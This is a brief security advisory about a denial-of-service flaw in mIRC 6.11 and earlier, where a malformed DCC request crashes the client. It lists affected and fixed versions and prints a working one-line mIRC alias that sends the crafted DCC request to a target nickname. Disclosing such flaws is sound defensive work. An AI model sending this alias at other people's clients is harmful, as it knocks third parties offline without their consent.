|
|
|
|
| |
| As we reported in our previous article: mIRC Unspecified DCC Request Vulnerability, a vulnerability in mIRC allows remote attackers to cause the program to crash by sending it a malformed DCC request. The following is an exploit code that can be used to test your system for the mentioned vulnerability. |
| |
Credit:
The information has been provided by hrmph.
|
| |
Vulnerable systems:
* mIRC version 6.11 and prior
Immune systems:
* mIRC version 6.12
It is possible to crash a mIRC client by sending a specially crafted DCC request.
Exploit:
mIRC alias:
/crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }
|
|
|
|
|
